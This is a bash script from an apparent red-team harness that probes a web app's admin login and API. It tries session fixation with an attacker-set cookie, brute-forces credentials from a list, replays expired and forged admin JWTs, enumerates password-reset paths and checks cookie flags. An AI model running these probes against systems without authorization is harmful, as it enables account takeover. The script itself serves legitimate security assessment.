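#!/usr/bin/env bash
# Auth & session checks for the red-team harness.
#
# Reads TARGET, API_TARGET, OUT and BRUTE_CREDS from ../config.sh and appends
# one line per probe to "$OUT/auth_session/summary.txt": the HTTP status in
# brackets followed by a label. Only status codes (and, for the login loop, a
# 60-char body hint) are recorded; interpreting them is left to the report.

SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
source "$SCRIPT_DIR/../config.sh"

# Fail early if config.sh did not provide what this script depends on. Without
# this guard an unset OUT would silently turn "$OUT/auth_session" into
# "/auth_session" and mkdir would try to create it at the filesystem root.
: "${OUT:?OUT must be set by config.sh}"
: "${TARGET:?TARGET must be set by config.sh}"
: "${API_TARGET:?API_TARGET must be set by config.sh}"

OUT="$OUT/auth_session"
mkdir -p "$OUT"
SUMMARY="$OUT/summary.txt"

# Per-run scratch files instead of fixed names under /tmp, so a stale or
# planted /tmp/jar.txt or /tmp/login_body.txt cannot be read or replaced by
# another local user. Both are removed on every exit path.
# NOTE(review): nothing in this script reads the jar or body file after the
# login loop; confirm no sibling script in the harness expects the old fixed
# /tmp paths before relying on this.
JAR=$(mktemp) || exit 1
LOGIN_BODY=$(mktemp) || exit 1
cleanup() { rm -f -- "$JAR" "$LOGIN_BODY"; }
trap cleanup EXIT

echo '=== AUTH & SESSION RED-TEAM ===' | tee "$SUMMARY"

echo '--- Session Fixation ---' | tee -a "$SUMMARY"
# Sends a client-chosen PHPSESSID to /admin/ and records the status code only.
# The line is a data point for the report, not a verdict: what a given status
# means depends on how the app handles unknown session ids.
resp=$(curl -sk -o /dev/null -w '%{http_code}' --max-time 10 -H 'Cookie: PHPSESSID=ATTACKER_CONTROLLED_SESSION_12345' "$TARGET/admin/")
echo "[$resp] Preset PHPSESSID to attacker value" | tee -a "$SUMMARY"

echo '' | tee -a "$SUMMARY"
echo '--- Admin Brute Force (top credentials) ---' | tee -a "$SUMMARY"
# BRUTE_CREDS comes from config.sh as "user:pass" entries. The split below
# assumes exactly one ':' — with more, user is the text before the first colon
# and pass the text after the last, so anything in between is dropped. Values
# are placed in the form body verbatim (no URL-encoding).
for cred in "${BRUTE_CREDS[@]}"; do
  user="${cred%%:*}"
  pass="${cred##*:}"
  # -c rewrites the cookie jar for each attempt; the body goes to a file so it
  # can be grepped for an outcome hint below.
  resp=$(curl -sk -c "$JAR" -o "$LOGIN_BODY" -w '%{http_code}' --max-time 10 -X POST -H 'Content-Type: application/x-www-form-urlencoded' -d "username=$user&password=$pass&submit=Login" "$TARGET/admin/")
  # First matching line, truncated to 60 chars. grep errors (e.g. an empty or
  # missing body after a failed request) are deliberately silenced so the
  # status code is still logged.
  body_hint=$(grep -i 'invalid\|wrong\|error\|failed\|logout\|dashboard' "$LOGIN_BODY" 2>/dev/null | head -1 | cut -c1-60)
  # The summary line records the credential pair in clear text; treat
  # summary.txt as sensitive when storing or sharing the run output.
  echo "[$resp] $user:$pass | $body_hint" | tee -a "$SUMMARY"
done

echo '' | tee -a "$SUMMARY"
echo '--- JWT Token Replay & Manipulation ---' | tee -a "$SUMMARY"
# Two static tokens with an HS256 header. The first carries a payload whose
# "exp" (1600000000) is in the past; the second carries sub/role "admin" with a
# far-future "exp" and a placeholder signature (base64 of "badsignature").
# Each is POSTed to the API's /encrypt endpoint and only the status is kept.
EXPIRED_JWT='eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJ0ZXN0IiwiZXhwIjoxNjAwMDAwMDAwfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c'
resp=$(curl -sk -o /dev/null -w '%{http_code}' --max-time 10 -H "Authorization: Bearer $EXPIRED_JWT" -H 'Content-Type: application/json' -d '{"data":"test"}' "$API_TARGET/encrypt")
echo "[$resp] Expired JWT" | tee -a "$SUMMARY"

WEAK_JWT='eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiIsImV4cCI6OTk5OTk5OTk5OX0.YmFkc2lnbmF0dXJl'
resp=$(curl -sk -o /dev/null -w '%{http_code}' --max-time 10 -H "Authorization: Bearer $WEAK_JWT" -H 'Content-Type: application/json' -d '{"data":"test"}' "$API_TARGET/encrypt")
echo "[$resp] Crafted admin JWT (fake sig)" | tee -a "$SUMMARY"

echo '' | tee -a "$SUMMARY"
echo '--- Password Reset Flow ---' | tee -a "$SUMMARY"
# Records which of these reset paths respond and with what status; the reset
# flow itself is not exercised here.
for path in '/reset-password' '/forgot-password' '/password-reset' '/api/reset' '/admin/reset'; do
  resp=$(curl -sk -o /dev/null -w '%{http_code}' --max-time 8 "$TARGET$path")
  echo "[$resp] $path" | tee -a "$SUMMARY"
done

echo '' | tee -a "$SUMMARY"
echo '--- Cookie Security Flags ---' | tee -a "$SUMMARY"
# Dumps the response headers of a login POST and keeps every Set-Cookie line so
# the report shows which flags (HttpOnly, Secure, SameSite, ...) are present.
# -D - writes headers to stdout while the POST body is still sent; the earlier
# -I (HEAD) together with -d selects two conflicting request methods, which
# curl rejects, leaving this section empty.
curl -sk -D - -o /dev/null --max-time 10 -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=admin&password=test' "$TARGET/admin/" | grep -i 'set-cookie' | tee -a "$SUMMARY"

cat "$SUMMARY"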